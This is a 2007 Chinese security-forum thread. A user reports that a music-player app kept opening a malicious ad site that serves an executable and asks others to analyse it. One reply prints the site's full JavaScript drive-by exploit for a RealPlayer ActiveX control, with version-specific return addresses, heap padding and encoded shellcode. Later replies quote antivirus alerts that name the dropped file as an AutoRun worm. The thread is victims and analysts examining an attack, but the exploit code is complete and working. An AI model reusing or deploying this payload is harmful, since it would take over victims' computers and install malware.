毒网，谁看看

显示全部楼层 · 发表于 2007-11-30 17:05:29

kuwoo音乐盒一打开就弹出来下面这个网址运行脚本错误..

hxxp://ad.2365.us/107/

看到一个 [url=http://ad.2365.us/107/]http://ad.2365.us/107/1.exe[/url] ，还有N个网页不会解，等待高人解下

ps.http://ad.2365.us/***/下都挂了相同的马(***=101～120中任何一个数字)

显示全部楼层 · 发表于 2007-11-30 17:17:04

function RealExploit(){var user=navigator.userAgent.toLowerCase();if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)return;if(user.indexOf("nt 5.")==-1)return;VulObject="IER"+"PCtl.I"+"ERP"+"Ctl.1";try{Real=new ActiveXObject(VulObject)}catch(error){return}RealVersion=Real.PlayerProperty("PRODUCTVERSION");Padding="";JmpOver=unescape("%75%06%74%04");for(i=0;i<32*148;i++)Padding+="S";if(RealVersion.indexOf("6.0.14.")==-1){if(navigator.userLanguage.toLowerCase()=="zh-cn")ret=unescape("%7f%a5%60");else if(navigator.userLanguage.toLowerCase()=="en-us")ret=unescape("%4f%71%a4%60");else return}else if(RealVersion=="6.0.14.544")ret=unescape("%63%11%08%60");else if(RealVersion=="6.0.14.550")ret=unescape("%63%11%04%60");else if(RealVersion=="6.0.14.552")ret=unescape("%79%31%01%60");else if(RealVersion=="6.0.14.543")ret=unescape("%79%31%09%60");else if(RealVersion=="6.0.14.536")ret=unescape("%51%11%70%63");else return;if(RealVersion.indexOf("6.0.10.")!=-1){for(i=0;i<4;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.11.")!=-1){for(i=0;i<6;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.12.")!=-1){for(i=0;i<9;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.14.")!=-1){for(i=0;i<10;i++)Padding=Padding+JmpOver;Padding=Padding+ret}AdjESP="LLLL\\XXXXXLD";Shell="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpfKRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKpTRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMWQuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoSQQtvNUbTs6V7EVN45QcfOuaTp4sto014nPeRXPeK0S0";PayLoad=Padding+AdjESP+Shell;while(PayLoad.length<0x8000)PayLoad+="ChuiZi";Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav",PayLoad,"",0,0);var cike=888}RealExploit();

复制代码

又看见REAL这个漏洞了。哎。。

显示全部楼层 · 发表于 2007-11-30 17:27:15

是的我也让这个网站给OVER了是在线视频漏洞吗？

显示全部楼层 · 发表于 2007-11-30 17:31:32

Roboon：蠕虫名称:Worm.Win32.AutoRun.im

程序:
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\TEMPORARY INTERNET FILES\CONTENT.IE5\BB38LBV5\1[1].EXE
是蠕虫程序!
已成功阻止其运行,是否要删除此文件?

蠕虫名称:Worm.Win32.AutoRun.im

程序:
D:\我的文档\桌面\1.EXE
是蠕虫程序!
已成功阻止其运行,是否要删除此文件?